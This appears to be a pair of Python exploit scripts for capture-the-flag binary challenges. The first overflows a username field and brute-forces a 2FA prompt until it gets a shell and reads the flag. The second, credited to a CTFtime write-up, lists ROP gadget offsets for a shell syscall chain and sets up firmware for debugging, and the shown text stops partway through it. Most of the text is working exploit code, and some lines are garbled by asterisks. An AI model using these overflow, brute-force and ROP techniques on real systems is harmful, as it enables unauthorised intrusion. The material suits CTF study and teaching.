import interact import struct p = interact.Process() # Overflow name and set refresh to 0 data = p.readuntil('Enter Admin Username:'******'A'*16 + '\x00'*8) data = p.readuntil('Enter your 2FA Code:') # Spam login attempts while True: data = p.readuntil('Enter Admin Username:'******'A'*8) data = p.readuntil('Enter your 2FA Code:') p.sendline('0'*20) data = p.readuntil('!') if 'shell' in data: p.sendline('cat flag') break p.interactive()
# This writeup is based off of: https://ctftime.org/writeup/11273 # Import the python libraries, and establish the target import interact import struct target = interact.Process() # Declare needed rop gadgets offsets popRdi = 0x21102 popRax = 0x33544 popRsi = 0x202e8 popRdx = 0x1b92 binsh = 0x18cd57 syscall = 0xbc375 addRsp = 0xc96a6 # A function desgined to just setup initial firmware to enable debugging def debugFirmware(): target.sendline('U') initialFirmware = "FW" + "\xa2\xc8" + "1081" + "9" initialFirmware = initialFirmware + "\x00" * (0x400 - len(initialFirmware)) target.sendline(initialFirmware) target.sendline(initialFirmware) target.sendline('E')